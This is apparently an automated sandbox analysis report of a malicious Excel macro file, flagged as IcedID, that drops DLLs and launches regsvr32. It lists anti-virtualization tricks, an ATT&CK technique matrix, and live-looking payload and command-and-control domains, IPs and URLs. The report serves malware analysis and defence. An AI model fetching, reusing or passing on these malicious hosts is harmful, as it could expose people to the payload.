        Source: C:\Windows\System32\regsvr32.exeRDTSC instruction interceptor: First address: 00000000005A1EAB second address: 00000000005A1EB8 instructions: 0x00000000 rdtsc 0x00000002 dec eax 0x00000003 shl edx, 20h 0x00000006 nop 0x00000007 dec eax 0x00000008 or eax, edx 0x0000000a dec eax 0x0000000b mov ecx, eax 0x0000000d rdtsc
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00312434 rdtsc 3_2_00312434
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,3_2_003127BC
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,4_2_021427BC
        Source: C:\Windows\System32\regsvr32.exeCode function: GetAdaptersInfo,GetAdaptersInfo,5_2_005A27BC
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\XNHC0JWC\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\ZAE7RW1P\lsdfik[1].fmlJump to dropped file
        Source: C:\Program Files\Microsoft Office\Office14\EXCEL.EXEDropped PE file which has not been started: C:\Users\user\AppData\Local\Microsoft\Windows\Temporary Internet Files\Content.IE5\5JC0A1KN\lsdfik[1].fmlJump to dropped file
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpBinary or memory string: <a href="/rds/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>Amazon RDS on VMware</span> <cite>Automate on-premises database management</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpBinary or memory string: <a href="/vmware/?hp=tile&amp;so-exp=below"> <i></i> <span>VMware Cloud on AWS</span> <cite>Build a hybrid cloud without custom hardware</cite> </a>
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpBinary or memory string: <img src="//d1.awsstatic.com/Compute/VMware-Cloud-on-AWS_Icon_64_Squid.b126bc9cff89e6c44c4f5b9775521edd6743c2b8.png" alt="VMware-Cloud-on-AWS_Icon_64_Squid" title="VMware-Cloud-on-AWS_Icon_64_Squid" class="cq-dd-image" />
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpBinary or memory string: Migrate and extend VMware environments to the AWS Cloud
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:20px; padding-bottom:0px; padding-right:45px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpBinary or memory string: </figure> <h3 id="VMware_Cloud_on_AWS" class="lb-tiny-align-center lb-txt-none lb-h3 lb-title"> VMware Cloud on AWS</h3>
        Source: regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpBinary or memory string: <a style="padding-left:30px; padding-bottom:0px; padding-right:30px;" href="/vmware/?hp=tile&amp;tile=hybridsol" target="_blank" rel="noopener">
        Source: C:\Windows\System32\regsvr32.exeProcess information queried: ProcessInformationJump to behavior
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_00312434 rdtsc 3_2_00312434

        HIPS / PFW / Operating System Protection Evasion:

        barindex
        System process connects to network (likely due to code injection or exploit)Show sources
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 13.225.75.73 187Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeNetwork Connect: 104.21.37.209 80Jump to behavior
        Source: C:\Windows\System32\regsvr32.exeDomain query: astrocycle.download
        Source: C:\Windows\System32\regsvr32.exeDomain query: aws.amazon.com
        Source: C:\Windows\System32\regsvr32.exeCode function: 3_2_003122DC LookupAccountNameW,3_2_003122DC

        Stealing of Sensitive Information:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2102480631.0000000000333000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3036, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1916, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3028, type: MEMORY

        Remote Access Functionality:

        barindex
        Yara detected IcedIDShow sources
        Source: Yara matchFile source: dump.pcap, type: PCAP
        Source: Yara matchFile source: 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000005.00000002.2102480631.0000000000333000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, type: MEMORY
        Source: Yara matchFile source: 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3036, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 1916, type: MEMORY
        Source: Yara matchFile source: Process Memory Space: regsvr32.exe PID: 3028, type: MEMORY

        Mitre Att&ck Matrix

        Initial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionExfiltrationCommand and ControlNetwork EffectsRemote Service EffectsImpact
        Valid AccountsExploitation for Client Execution43Path InterceptionProcess Injection11Masquerading121OS Credential DumpingSecurity Software Discovery211Remote ServicesArchive Collected Data1Exfiltration Over Other Network MediumEncrypted Channel12Eavesdrop on Insecure Network CommunicationRemotely Track Device Without AuthorizationModify System Partition
        Default AccountsScheduled Task/JobBoot or Logon Initialization ScriptsBoot or Logon Initialization ScriptsDisable or Modify Tools1LSASS MemoryProcess Discovery1Remote Desktop ProtocolData from Removable MediaExfiltration Over BluetoothIngress Tool Transfer14Exploit SS7 to Redirect Phone Calls/SMSRemotely Wipe Data Without AuthorizationDevice Lockout
        Domain AccountsAt (Linux)Logon Script (Windows)Logon Script (Windows)Process Injection11Security Account ManagerAccount Discovery1SMB/Windows Admin SharesData from Network Shared DriveAutomated ExfiltrationNon-Application Layer Protocol3Exploit SS7 to Track Device LocationObtain Device Cloud BackupsDelete Device Data
        Local AccountsAt (Windows)Logon Script (Mac)Logon Script (Mac)Regsvr321NTDSSystem Owner/User Discovery1Distributed Component Object ModelInput CaptureScheduled TransferApplication Layer Protocol124SIM Card SwapCarrier Billing Fraud
        Cloud AccountsCronNetwork Logon ScriptNetwork Logon ScriptSoftware PackingLSA SecretsRemote System Discovery1SSHKeyloggingData Transfer Size LimitsFallback ChannelsManipulate Device CommunicationManipulate App Store Rankings or Ratings
        Replication Through Removable MediaLaunchdRc.commonRc.commonSteganographyCached Domain CredentialsSystem Network Configuration Discovery1VNCGUI Input CaptureExfiltration Over C2 ChannelMultiband CommunicationJamming or Denial of ServiceAbuse Accessibility Features
        External Remote ServicesScheduled TaskStartup ItemsStartup ItemsCompile After DeliveryDCSyncFile and Directory Discovery1Windows Remote ManagementWeb Portal CaptureExfiltration Over Alternative ProtocolCommonly Used PortRogue Wi-Fi Access PointsData Encrypted for Impact
        Drive-by CompromiseCommand and Scripting InterpreterScheduled Task/JobScheduled Task/JobIndicator Removal from ToolsProc FilesystemSystem Information Discovery22Shared WebrootCredential API HookingExfiltration Over Symmetric Encrypted Non-C2 ProtocolApplication Layer ProtocolDowngrade to Insecure ProtocolsGenerate Fraudulent Advertising Revenue

        Behavior Graph

        Hide Legend

        Legend:

        • Process
        • Signature
        • Created File
        • DNS/IP Info
        • Is Dropped
        • Is Windows Process
        • Number of created Registry Values
        • Number of created Files
        • Visual Basic
        • Delphi
        • Java
        • .Net C# or VB.NET
        • C, C++ or other language
        • Is malicious
        • Internet
        behaviorgraph top1 signatures2 2 Behavior Graph ID: 444712 Sample: Formtofill4184860.xlsm Startdate: 06/07/2021 Architecture: WINDOWS Score: 100 47 Found malware configuration 2->47 49 Document exploit detected (drops PE files) 2->49 51 Office document tries to convince victim to disable security protection (e.g. to enable ActiveX or Macros) 2->51 53 6 other signatures 2->53 6 EXCEL.EXE 53 28 2->6         started        process3 dnsIp4 27 thousandsyears.download 104.21.52.111, 49165, 80 CLOUDFLARENETUS United States 6->27 29 uppercilio.fun 172.67.146.88, 49167, 80 CLOUDFLARENETUS United States 6->29 31 voopeople.fun 172.67.194.117, 49166, 80 CLOUDFLARENETUS United States 6->31 19 C:\Users\user\XZIBIT.dll, PE32+ 6->19 dropped 21 C:\Users\user\XTOWN.dll, PE32+ 6->21 dropped 23 C:\Users\user\XRAY.dll, PE32+ 6->23 dropped 25 3 other malicious files 6->25 dropped 55 Document exploit detected (creates forbidden files) 6->55 57 Document exploit detected (UrlDownloadToFile) 6->57 11 regsvr32.exe 4 6->11         started        15 regsvr32.exe 6->15         started        17 regsvr32.exe 6->17         started        file5 signatures6 process7 dnsIp8 33 astrocycle.download 104.21.37.209, 49169, 49171, 49173 CLOUDFLARENETUS United States 11->33 35 dr49lng3n1n2s.cloudfront.net 13.225.75.73, 443, 49168, 49170 AMAZON-02US United States 11->35 45 2 other IPs or domains 11->45 59 System process connects to network (likely due to code injection or exploit) 11->59 61 Contains functionality to detect hardware virtualization (CPUID execution measurement) 11->61 63 Tries to detect virtualization through RDTSC time measurements 11->63 37 tp.8e49140c2-frontier.amazon.com 15->37 39 aws.amazon.com 15->39 41 tp.8e49140c2-frontier.amazon.com 17->41 43 aws.amazon.com 17->43 signatures9

        Screenshots

        Thumbnails

        This section contains all screenshots as thumbnails, including those not shown in the slideshow.

        windows-stand

        Antivirus, Machine Learning and Genetic Malware Detection

        Initial Sample

        No Antivirus matches

        Dropped Files

        No Antivirus matches

        Unpacked PE Files

        No Antivirus matches

        Domains

        No Antivirus matches

        URLs

        SourceDetectionScannerLabelLink
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        http://www.diginotar.nl/cps/pkioverheid00%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-hom0%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://ocsp.rootg2.amazontrust.com080%URL Reputationsafe
        http://voopeople.fun/div/44376,8555986111.jpg1%VirustotalBrowse
        http://voopeople.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://crl.sca1b.amazontrust.com/sca1b.crl00%URL Reputationsafe
        http://astrocycle.download/0%Avira URL Cloudsafe
        http://servername/isapibackend.dll0%Avira URL Cloudsafe
        http://crl.sca1b.amazontrus0%Avira URL Cloudsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://ocsp.sca1b.amazontrust.com060%URL Reputationsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://crl.rootca1.amazontrust.com/rootca1.crl00%URL Reputationsafe
        http://ocsp.rootca1.amazontrust.com0:0%Avira URL Cloudsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://windowsmedia.com/redir/services.asp?WMPFriendly=true0%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://crl.rootg2.amazontrust.com/rootg2.crl00%URL Reputationsafe
        http://uppercilio.fun/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        http://o.ss2.us/00%URL Reputationsafe
        http://o.ss2.us/00%URL Reputationsafe
        http://o.ss2.us/00%URL Reputationsafe
        http://thousandsyears.download/div/44376,8555986111.jpg0%Avira URL Cloudsafe
        http://ocsp.entrust.net030%URL Reputationsafe
        http://ocsp.entrust.net030%URL Reputationsafe
        http://ocsp.entrust.net030%URL Reputationsafe
        http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
        http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
        http://crt.rootg2.amazontrust.com/rootg2.cer0=0%URL Reputationsafe
        http://crl.YuWt0%Avira URL Cloudsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.icra.org/vocabulary/.0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://www.%s.comPA0%URL Reputationsafe
        http://ocsp.entrust.net0D0%URL Reputationsafe
        http://ocsp.entrust.net0D0%URL Reputationsafe
        http://ocsp.entrust.net0D0%URL Reputationsafe
        http://s.ss2.us/r.crl00%URL Reputationsafe
        http://s.ss2.us/r.crl00%URL Reputationsafe
        http://s.ss2.us/r.crl00%URL Reputationsafe

        Domains and IPs

        Contacted Domains

        NameIPActiveMaliciousAntivirus DetectionReputation
        uppercilio.fun
        		172.67.146.88
        		truefalse
          		unknown
          thousandsyears.download
          		104.21.52.111
          		truefalse
            		unknown
            voopeople.fun
            		172.67.194.117
            		truefalse
              		unknown
              astrocycle.download
              		104.21.37.209
              		truetrue
                		unknown
                dr49lng3n1n2s.cloudfront.net
                		13.225.75.73
                		truefalse
                  		high
                  aws.amazon.com
                  		unknown
                  		unknownfalse
                    		high

                    Contacted URLs

                    NameMaliciousAntivirus DetectionReputation
                    http://voopeople.fun/div/44376,8555986111.jpgfalse
                    • 1%, Virustotal, Browse
                    • Avira URL Cloud: safe
                    		unknown
                    http://astrocycle.download/true
                    • Avira URL Cloud: safe
                    		unknown
                    http://uppercilio.fun/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown
                    http://thousandsyears.download/div/44376,8555986111.jpgfalse
                    • Avira URL Cloud: safe
                    		unknown

                    URLs from Memory and Binaries

                    NameSourceMaliciousAntivirus DetectionReputation
                    https://twitter.com/awscloudregsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                      		high
                      https://a0.awsstatic.com/libra/1.0.385/directoriesregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                        		high
                        https://aws.amazon.com/terms/?nc1=f_prregsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                          		high
                          https://dc.ads.linkedin.com/collect/?pid=3038&amp;fmt=gifregsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                            		high
                            https://s0.awsstatic.com/en_US/nav/v3/panel-content/mobile/index.htmlregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                              		high
                              https://aws.amazon.com/cn/regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                		high
                                http://crl.pkioverheid.nl/DomOrganisatieLatestCRL-G2.crl0regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                http://www.diginotar.nl/cps/pkioverheid0regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpfalse
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                • URL Reputation: safe
                                		unknown
                                https://a0.awsstatic.com/libra-css/imagesregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                  		high
                                  https://a0.awsstatic.com/libra/1.0.385/librastandardlibregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                    		high
                                    https://a0.awsstatic.com/psf/nullregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                      		high
                                      https://aws.amazon.com/ar/regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                        		high
                                        https://www.honeycode.aws/?&amp;trk=el_a134p000003yC6YAAU&amp;trkCampaign=pac-edm-2020-honeycode-homregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        • URL Reputation: safe
                                        		unknown
                                        https://pages.awscloud.com/zillow-case-study?hp=tile&amp;story=zllwregsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                          		high
                                          https://pages.awscloud.com/communication-preferences?trk=homepageregsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                                            		high
                                            http://ocsp.rootg2.amazontrust.com08regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpfalse
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            • URL Reputation: safe
                                            		unknown
                                            https://aws.amazon.com/cn/?nc1=h_lsregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                                              		high
                                              https://portal.aws.amazon.com/gp/aws/developer/registration/index.html?nc1=f_ct&amp;src=defaultregsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                                                		high
                                                https://aws.amazon.com/ru/regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                  		high
                                                  https://aws.amazon.com/tw/?nc1=h_lsregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                                                    		high
                                                    https://fls-na.amazon.com/1/action-impressions/1/OE/aws-mktg/action/awsm_:comp_DeprecatedBrowserregsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                                                      		high
                                                      https://i18n-string.us-west-2.prod.pricing.aws.a2z.comregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                        		high
                                                        https://aws.amazon.com/ko/regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                          		high
                                                          https://aws.amazon.com/ru/?nc1=h_lsregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                                                            		high
                                                            https://a0.awsstatic.com/libra-css/images/site/fav/favicon.icoregsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                              		high
                                                              https://aws.amazon.com/es/regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                		high
                                                                http://crl.sca1b.amazontrust.com/sca1b.crl0regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpfalse
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                • URL Reputation: safe
                                                                		unknown
                                                                https://docs.aws.amazon.com/index.html?nc2=h_ql_docregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                  		high
                                                                  https://aws.amazon.com/ar/?nc1=h_lsregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                                                                    		high
                                                                    http://servername/isapibackend.dllregsvr32.exe, 00000003.00000002.2087898389.0000000001DC0000.00000002.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095197716.0000000001C90000.00000002.00000001.sdmpfalse
                                                                    • Avira URL Cloud: safe
                                                                    		low
                                                                    https://aws.amazon.com/th/regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                      		high
                                                                      http://www.windows.com/pctv.regsvr32.exe, 00000003.00000002.2089794401.00000000030A0000.00000002.00000001.sdmpfalse
                                                                        		high
                                                                        https://a0.awsstatic.com/pricing-calculator/js/1.0.2regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                          		high
                                                                          https://a0.awsstatic.com/plc/js/1.0.112/plcregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                            		high
                                                                            https://aws.amazon.com/marketplace/?nc2=h_moregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                              		high
                                                                              http://crl.sca1b.amazontrusregsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://ocsp.sca1b.amazontrust.com06regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpfalse
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              • URL Reputation: safe
                                                                              		unknown
                                                                              https://amazon.com/regsvr32.exe, 00000003.00000002.2087792591.000000000029D000.00000004.00000020.sdmp, regsvr32.exe, 00000004.00000002.2095095491.00000000003C7000.00000004.00000020.sdmpfalse
                                                                                		high
                                                                                https://a0.awsstatic.com/libra-css/images/logos/aws_logo_smile_179x109.pngregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                                  		high
                                                                                  https://console.aws.amazon.com/support/home/?nc2=h_ql_curegsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                                    		high
                                                                                    http://crl.rootca1.amazontrust.com/rootca1.crl0regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpfalse
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    • URL Reputation: safe
                                                                                    		unknown
                                                                                    https://aws.amazon.com/search/regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                                      		high
                                                                                      https://console.aws.amazon.com/iam/home?nc2=h_m_sc#security_credentialregsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                                        		high
                                                                                        https://aws.amazon.com/?nc2=h_lgregsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                                          		high
                                                                                          http://ocsp.rootca1.amazontrust.com0:regsvr32.exe, 00000003.00000002.2087745219.00000000001B0000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2095072879.000000000039E000.00000004.00000020.sdmp, regsvr32.exe, 00000005.00000002.2102395767.00000000001C0000.00000004.00000001.sdmpfalse
                                                                                          • Avira URL Cloud: safe
                                                                                          		unknown
                                                                                          https://console.aws.amazon.com/support/home/?nc1=f_drregsvr32.exe, 00000003.00000002.2090830092.00000000035A4000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000002.2097680813.00000000030D0000.00000004.00000001.sdmpfalse
                                                                                            		high
                                                                                            https://aws.amazon.com/fr/regsvr32.exe, 00000003.00000003.2083960729.00000000035DC000.00000004.00000001.sdmp, regsvr32.exe, 00000004.00000003.2091167423.00000000030DE000.00000004.00000001.sdmpfalse
                                                                                              		high
